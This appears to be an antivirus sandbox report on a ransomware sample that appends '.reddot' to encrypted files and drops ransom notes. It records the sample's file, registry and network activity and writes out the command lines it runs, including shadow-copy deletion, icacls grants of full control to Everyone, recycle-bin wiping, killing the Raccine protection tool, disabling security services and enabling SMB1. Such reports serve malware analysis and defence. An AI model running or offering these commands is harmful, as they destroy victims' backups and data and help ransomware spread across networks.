Technical Information
To ensure autorun and distribution
Sets the following service settings
- [<HKLM>\System\CurrentControlSet\Services\Dnscache] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\fdPHost] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\SSDPSRV] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\upnphost] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\FDResPub] 'Start' = '00000002'
Creates the following files on removable media
- <Drive name for removable media>:\delete.avi.reddot
- <Drive name for removable media>:\how_to_restore_my_files.txt
- <Drive name for removable media>:\000814251_video_01.avi.reddot
- <Drive name for removable media>:\correct.avi.reddot
- <Drive name for removable media>:\join.avi.reddot
- <Drive name for removable media>:\dashborder_120.bmp.reddot
- <Drive name for removable media>:\tileimage.bmp.reddot
- <Drive name for removable media>:\dial.bmp.reddot
- <Drive name for removable media>:\dashborder_192.bmp.reddot
Malicious functions
Executes the following
- '<SYSTEM32>\taskkill.exe' /F /IM Raccine.exe
- '<SYSTEM32>\taskkill.exe' /F /IM RaccineSettings.exe
- '<SYSTEM32>\netsh.exe' advfirewall firewall set rule group="Network Discovery" new enable=Yes
- '<SYSTEM32>\netsh.exe' advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
Disables AMSI.
Modifies file system
Creates the following files
- %APPDATA%\microsoft\windows\templates\google.url
- C:\far2\plugins\compare\how_to_restore_my_files.txt
- C:\far2\plugins\compare\cmpeng.hlf.reddot
- C:\far2\plugins\compare\cmprus.hlf.reddot
- C:\far2\plugins\compare\compare.map.reddot
- C:\far2\plugins\compare\compeng.lng.reddot
- C:\far2\plugins\compare\comprus.lng.reddot
- C:\far2\plugins\drawline\changelog.reddot
- C:\far2\plugins\brackets\changelog.reddot
- C:\far2\plugins\compare\changelog.reddot
- C:\far2\plugins\drawline\how_to_restore_my_files.txt
- C:\far2\plugins\drawline\drawline.map.reddot
- C:\far2\plugins\drawline\drawrus.hlf.reddot
- C:\far2\plugins\drawline\drawrus.lng.reddot
- C:\far2\plugins\editcase\changelog.reddot
- C:\far2\plugins\editcase\how_to_restore_my_files.txt
- C:\far2\plugins\editcase\ecaseeng.hlf.reddot
- C:\far2\plugins\editcase\ecaseeng.lng.reddot
- C:\far2\plugins\drawline\draweng.hlf.reddot
- C:\far2\plugins\drawline\draweng.lng.reddot
- C:\far2\plugins\brackets\brackrus.reg.reddot
- C:\far2\plugins\brackets\brackrus.lng.reddot
- C:\far2\plugins\brackets\brackrus.hlf.reddot
- C:\far2\plugins\arclite\7zsd.sfx.reddot
- C:\far2\plugins\arclite\arclite.map.reddot
- C:\far2\plugins\arclite\arclite_eng.hlf.reddot
- C:\far2\plugins\arclite\arclite_eng.lng.reddot
- C:\far2\plugins\arclite\arclite_rus.hlf.reddot
- C:\far2\plugins\arclite\arclite_rus.lng.reddot
- C:\far2\plugins\arclite\changelog.reddot
- C:\far2\plugins\autowrap\autowrap.map.reddot
- C:\far2\plugins\arclite\7zs2con.sfx.reddot
- C:\far2\plugins\autowrap\how_to_restore_my_files.txt
- C:\far2\plugins\autowrap\wrapeng.lng.reddot
- C:\far2\plugins\autowrap\wraprus.lng.reddot
- C:\far2\plugins\brackets\brackdel.reg.reddot
- C:\far2\plugins\brackets\how_to_restore_my_files.txt
- C:\far2\plugins\brackets\brackeng.hlf.reddot
- C:\far2\plugins\brackets\brackeng.lng.reddot
- C:\far2\plugins\brackets\brackeng.reg.reddot
- C:\far2\plugins\brackets\brackets.map.reddot
- C:\far2\plugins\autowrap\changelog.reddot
- C:\far2\plugins\editcase\ecaserus.hlf.reddot
- C:\far2\plugins\editcase\editcase.map.reddot
- C:\far2\plugins\ftp\lib\ftpprogress.map.reddot
- C:\far2\plugins\emenu\changelog.reddot
- C:\far2\plugins\ftp\changelog.reddot
- C:\far2\plugins\ftp\how_to_restore_my_files.txt
- C:\far2\plugins\ftp\farftp.map.reddot
- C:\far2\plugins\ftp\ftpcmds.txt.reddot
- C:\far2\plugins\ftp\ftpcmds_rus.txt.reddot
- C:\far2\plugins\ftp\ftpeng.hlf.reddot
- C:\far2\plugins\ftp\ftpeng.lng.reddot
- C:\far2\plugins\filecase\changelog.reddot
- C:\far2\plugins\filecase\filecase.map.reddot
- C:\far2\plugins\ftp\ftprus.hlf.reddot
- C:\far2\plugins\ftp\notes_rus.txt.reddot
- C:\far2\plugins\ftp\techinfo.reg.reddot
- C:\far2\plugins\ftp\techinfo_rus.reg.reddot
- C:\far2\plugins\ftp\lib\ftpdirlist.fll.reddot
- C:\far2\plugins\ftp\lib\how_to_restore_my_files.txt
- C:\far2\plugins\ftp\lib\ftpdirlist.map.reddot
- C:\far2\plugins\ftp\lib\ftpprogress.fll.reddot
- C:\far2\plugins\ftp\ftprus.lng.reddot
- C:\far2\plugins\ftp\notes.txt.reddot
- C:\far2\plugins\filecase\caserus.lng.reddot
- C:\far2\plugins\filecase\caserus.hlf.reddot
- C:\far2\plugins\filecase\caseeng.lng.reddot
- C:\far2\plugins\emenu\emenu.map.reddot
- C:\far2\plugins\emenu\emenudel.reg.reddot
- C:\far2\plugins\emenu\emenueng.hlf.reddot
- C:\far2\plugins\emenu\emenueng.lng.reddot
- C:\far2\plugins\emenu\emenurus.hlf.reddot
- C:\far2\plugins\emenu\emenurus.lng.reddot
- C:\far2\plugins\emenu\hotkey.reg.reddot
- C:\far2\plugins\emenu\hotkeyclipboard.reg.reddot
- C:\far2\plugins\emenu\how_to_restore_my_files.txt
- C:\far2\plugins\emenu\hotkeyproperties.reg.reddot
- C:\far2\plugins\farcmds\how_to_restore_my_files.txt
- C:\far2\plugins\farcmds\farcmds.map.reddot
- C:\far2\plugins\farcmds\farcmdseng.hlf.reddot
- C:\far2\plugins\farcmds\farcmdseng.lng.reddot
- C:\far2\plugins\farcmds\farcmdsrus.hlf.reddot
- C:\far2\plugins\farcmds\farcmdsrus.lng.reddot
- C:\far2\plugins\filecase\caseeng.hlf.reddot
- C:\far2\plugins\filecase\how_to_restore_my_files.txt
- C:\far2\plugins\farcmds\changelog.reddot
- C:\far2\plugins\arclite\7zs2.sfx.reddot
- C:\far2\plugins\editcase\ecaserus.lng.reddot
- C:\far2\plugins\arclite\7zcon.sfx.reddot
- C:\far2\addons\colors\descript.ion.reddot
- C:\far2\farrus.hlf.reddot
- C:\totalcmd\descript.ion.reddot
- C:\far2\farrus.lng.reddot
- C:\totalcmd\history.txt.reddot
- C:\far2\farspa.lng.reddot
- C:\far2\file_id.diz.reddot
- C:\totalcmd\keyboard.txt.reddot
- C:\totalcmd\how_to_restore_my_files.txt
- C:\far2\farpol.lng.reddot
- C:\totalcmd\no.bar.reddot
- C:\far2\savesettings.cmd.reddot
- C:\far2\addons\descript.ion.reddot
- C:\far2\addons\how_to_restore_my_files.txt
- C:\totalcmd\sfxhead.sfx.reddot
- C:\totalcmd\size!.txt.reddot
- C:\far2\addons\readme.txt.reddot
- C:\totalcmd\tcunin64.wul.reddot
- C:\far2\restoresettings.cmd.reddot
- C:\totalcmd\register.rtf.reddot
- C:\totalcmd\default.bar.reddot
- C:\far2\farhun.lng.reddot
- C:\far2\farhun.hlf.reddot
- %TEMP%\0x4fdbl0.cmdline
- %TEMP%\0x4fdbl0.out
- %TEMP%\csc911cbf777c34d928b4a65f67f71fe55.tmp
- %TEMP%\rese5fb.tmp
- %TEMP%\0x4fdbl0.dll
- %APPDATA%\108f06a29e18280d8da5d8d84c508f27
- %APPDATA%\how_to_restore_my_files.txt
- C:\far2\changelog.reddot
- %TEMP%\0x4fdbl0.0.cs
- C:\far2\how_to_restore_my_files.txt
- C:\far2\clearpluginscache.cmd.reddot
- C:\far2\far.map.reddot
- C:\far2\farcze.lng.reddot
- C:\far2\fareng.hlf.reddot
- C:\far2\fareng.lng.reddot
- D:\install.log.reddot
- D:\how_to_restore_my_files.txt
- C:\far2\farger.lng.reddot
- C:\far2\changelog_eng.reddot
- C:\totalcmd\tcuninst.wul.reddot
- C:\far2\addons\colors\how_to_restore_my_files.txt
- C:\far2\plugins\arclite\7z.sfx.reddot
- C:\far2\addons\colors\export_colors.bat.reddot
- C:\far2\documentation\rus\plugins_install.txt.reddot
- C:\far2\documentation\rus\plugins_review.txt.reddot
- C:\far2\documentation\rus\techinfo.txt.reddot
- C:\far2\encyclopedia\farencyclopedia_ru.chm.reddot
- C:\far2\encyclopedia\how_to_restore_my_files.txt
- C:\far2\encyclopedia\tap\12_r0m.tap.reddot
- C:\far2\encyclopedia\tap\how_to_restore_my_files.txt
- C:\far2\documentation\rus\bug_report.txt.reddot
- C:\far2\documentation\rus\far_faq.txt.reddot
- C:\far2\encyclopedia\tap\code.bin.reddot
- C:\far2\fexcept\how_to_restore_my_files.txt
- C:\far2\fexcept\setfarexceptionhandler.reg.reddot
- C:\far2\plugins\align\align.map.reddot
- C:\far2\plugins\align\how_to_restore_my_files.txt
- C:\far2\plugins\align\aligneng.lng.reddot
- C:\far2\plugins\align\alignrus.lng.reddot
- C:\far2\plugins\align\changelog.reddot
- C:\far2\encyclopedia\tap\code.idb.reddot
- C:\far2\fexcept\changelog.reddot
- C:\far2\documentation\rus\how_to_restore_my_files.txt
- C:\far2\documentation\rus\arc_support.txt.reddot
- C:\far2\documentation\eng\techinfo.txt.reddot
- C:\far2\addons\colors\custom_highlighting\black_from_fonarev.reg.reddot
- C:\far2\addons\colors\custom_highlighting\how_to_restore_my_files.txt
- C:\far2\addons\colors\custom_highlighting\black_from_july.reg.reddot
- C:\far2\addons\colors\custom_highlighting\black_from_myodov.reg.reddot
- C:\far2\addons\colors\custom_highlighting\colors_from_admin_essp_ru.reg.reddot
- C:\far2\addons\colors\custom_highlighting\colors_from_gernichenko.reg.reddot
- C:\far2\addons\colors\custom_highlighting\colors_from_sadovoj.reg.reddot
- C:\far2\addons\colors\custom_highlighting\descript.ion.reddot
- C:\far2\addons\colors\import_colors.bat.reddot
- C:\far2\addons\colors\custom_highlighting\dn_like.reg.reddot
- C:\far2\addons\colors\custom_highlighting\greenmile.reg.reddot
- C:\far2\documentation\eng\arc_support.txt.reddot
- C:\far2\documentation\eng\how_to_restore_my_files.txt
- C:\far2\documentation\eng\bug_report.txt.reddot
- C:\far2\documentation\eng\far_faq.txt.reddot
- C:\far2\documentation\eng\plugins_install.txt.reddot
- C:\far2\addons\colors\custom_highlighting\hell.reg.reddot
- C:\far2\documentation\eng\plugins_review.txt.reddot
- C:\far2\addons\colors\custom_highlighting\farcolors242.reg.reddot
- C:\far2\plugins\arclite\how_to_restore_my_files.txt
- C:\totalcmd\totalcmd.chm.reddot
Deletes the following files
- %TEMP%\rese5fb.tmp
- %TEMP%\csc911cbf777c34d928b4a65f67f71fe55.tmp
- %TEMP%\0x4fdbl0.out
- %TEMP%\0x4fdbl0.0.cs
- %TEMP%\0x4fdbl0.dll
- %TEMP%\0x4fdbl0.cmdline
Deletes itself.
Changes user data files extensions (Trojan.Encoder).
Network activity
Connects to
- '<LOCALNET>.78.19':445
- '<LOCALNET>.78.1':445
- '<LOCALNET>.78.1':139
- '<LOCALNET>.78.1':80
- '21#.#64.207.9':80
TCP
Other
- '<LOCALNET>.78.19':445
- '<LOCALNET>.78.19':49173
UDP
- 'localhost':62376
- 'localhost':62373
Miscellaneous
Searches for the following windows
- ClassName: '' WindowName: ''
Creates and executes the following
- '<SYSTEM32>\net.exe' session' (with hidden window)
- '<SYSTEM32>\sc.exe' config FDResPub start= auto' (with hidden window)
- '<SYSTEM32>\netsh.exe' advfirewall firewall set rule group="Network Discovery" new enable=Yes' (with hidden window)
- '<SYSTEM32>\netsh.exe' advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol' (with hidden window)
- '<SYSTEM32>\mountvol.exe' B: \\?\Volume{c84d25cc-f368-11e4-889d-806e6f6e6963}\' (with hidden window)
- '<SYSTEM32>\mountvol.exe' G: \\?\Volume{81683e85-9377-11eb-9f02-806e6f6e6963}\' (with hidden window)
- '<SYSTEM32>\mountvol.exe' H: \\?\Volume{c84d25cd-f368-11e4-889d-806e6f6e6963}\' (with hidden window)
- '<SYSTEM32>\mountvol.exe' I: \\?\Volume{600ba660-c712-11e6-a54f-080027cffa47}\' (with hidden window)
- '<SYSTEM32>\mountvol.exe' J: \\?\Volume{fe3a3215-337f-11e6-9eec-806e6f6e6963}\' (with hidden window)
- '<SYSTEM32>\mountvol.exe' K: \\?\Volume{14a83a59-f375-11e4-92d6-806e6f6e6963}\' (with hidden window)
- '<SYSTEM32>\icacls.exe' "C:*" /grant Everyone:F /T /C /Q' (with hidden window)
- '<SYSTEM32>\icacls.exe' "D:*" /grant Everyone:F /T /C /Q' (with hidden window)
- '<SYSTEM32>\icacls.exe' "Z:*" /grant Everyone:F /T /C /Q' (with hidden window)
- '<SYSTEM32>\net.exe' use \\10.0.78.19' (with hidden window)
- '<SYSTEM32>\net.exe' use \\10.0.78.1' (with hidden window)
- '<SYSTEM32>\sc.exe' config upnphost start= auto' (with hidden window)
- '<SYSTEM32>\net.exe' use "\\qepnhecxthbd\D$"' (with hidden window)
- '<SYSTEM32>\sc.exe' config SSDPSRV start= auto' (with hidden window)
- '<SYSTEM32>\sc.exe' config Dnscache start= auto' (with hidden window)
- '<SYSTEM32>\wscript.exe' <PATH_SAMPLE>.js' (with hidden window)
- '<SYSTEM32>\cscript.exe' -e:{F414C262-6AC0-11CF-B6D1-00AA00BBBB58} <PATH_SAMPLE>.js' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\0x4fdbl0.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESE5FB.tmp" "%TEMP%\CSC911CBF777C34D928B4A65F67F71FE55.TMP"' (with hidden window)
- '<SYSTEM32>\taskkill.exe' /F /IM Raccine.exe' (with hidden window)
- '<SYSTEM32>\taskkill.exe' /F /IM RaccineSettings.exe' (with hidden window)
- '<SYSTEM32>\schtasks.exe' /DELETE /TN "Raccine Rules Updater" /F' (with hidden window)
- '<SYSTEM32>\sc.exe' config SQLTELEMETRY start= disabled' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Get-CimInstance Win32_ShadowCopy | Remove-CimInstance' (with hidden window)
- '<SYSTEM32>\sc.exe' config SQLTELEMETRY$ECWDB2 start= disabled' (with hidden window)
- '<SYSTEM32>\sc.exe' config SQLWriter start= disabled' (with hidden window)
- '<SYSTEM32>\sc.exe' config SstpSvc start= disabled' (with hidden window)
- '<SYSTEM32>\sc.exe' config MBAMService start= disabled' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c rd /s /q D:\\$Recycle.bin' (with hidden window)
- '<SYSTEM32>\sc.exe' config fdPHost start= auto' (with hidden window)
- '<SYSTEM32>\net.exe' use "\\qepnhecxthbd\Users"' (with hidden window)
Executes the following
- '<SYSTEM32>\net.exe' session
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
- '<SYSTEM32>\mountvol.exe'
- '<SYSTEM32>\mountvol.exe' B: \\?\Volume{c84d25cc-f368-11e4-889d-806e6f6e6963}\
- '<SYSTEM32>\mountvol.exe' G: \\?\Volume{81683e85-9377-11eb-9f02-806e6f6e6963}\
- '<SYSTEM32>\mountvol.exe' H: \\?\Volume{c84d25cd-f368-11e4-889d-806e6f6e6963}\
- '<SYSTEM32>\mountvol.exe' I: \\?\Volume{600ba660-c712-11e6-a54f-080027cffa47}\
- '<SYSTEM32>\mountvol.exe' J: \\?\Volume{fe3a3215-337f-11e6-9eec-806e6f6e6963}\
- '<SYSTEM32>\mountvol.exe' K: \\?\Volume{14a83a59-f375-11e4-92d6-806e6f6e6963}\
- '<SYSTEM32>\icacls.exe' "C:*" /grant Everyone:F /T /C /Q
- '<SYSTEM32>\icacls.exe' "D:*" /grant Everyone:F /T /C /Q
- '<SYSTEM32>\icacls.exe' "Z:*" /grant Everyone:F /T /C /Q
- '<SYSTEM32>\arp.exe' -a
- '<SYSTEM32>\net.exe' view
- '<SYSTEM32>\net.exe' use \\10.0.78.19
- '<SYSTEM32>\net.exe' use \\10.0.78.1
- '<SYSTEM32>\sc.exe' config FDResPub start= auto
- '<SYSTEM32>\net.exe' use "\\qepnhecxthbd\D$"
- '<SYSTEM32>\sc.exe' config upnphost start= auto
- '<SYSTEM32>\sc.exe' config fdPHost start= auto
- '<SYSTEM32>\net1.exe' session
- '<SYSTEM32>\wscript.exe' <PATH_SAMPLE>.js
- '<SYSTEM32>\cscript.exe' -e:{F414C262-6AC0-11CF-B6D1-00AA00BBBB58} <PATH_SAMPLE>.js
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\0x4fdbl0.cmdline"
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESE5FB.tmp" "%TEMP%\CSC911CBF777C34D928B4A65F67F71FE55.TMP"
- '<SYSTEM32>\schtasks.exe' /DELETE /TN "Raccine Rules Updater" /F
- '<SYSTEM32>\sc.exe' config SQLTELEMETRY start= disabled
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Get-CimInstance Win32_ShadowCopy | Remove-CimInstance
- '<SYSTEM32>\sc.exe' config SQLTELEMETRY$ECWDB2 start= disabled
- '<SYSTEM32>\sc.exe' config SQLWriter start= disabled
- '<SYSTEM32>\sc.exe' config SstpSvc start= disabled
- '<SYSTEM32>\sc.exe' config MBAMService start= disabled
- '<SYSTEM32>\cmd.exe' /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
- '<SYSTEM32>\cmd.exe' /c rd /s /q D:\\$Recycle.bin
- '<SYSTEM32>\sc.exe' config Dnscache start= auto
- '<SYSTEM32>\sc.exe' config SSDPSRV start= auto
- '<SYSTEM32>\net.exe' use "\\qepnhecxthbd\Users"
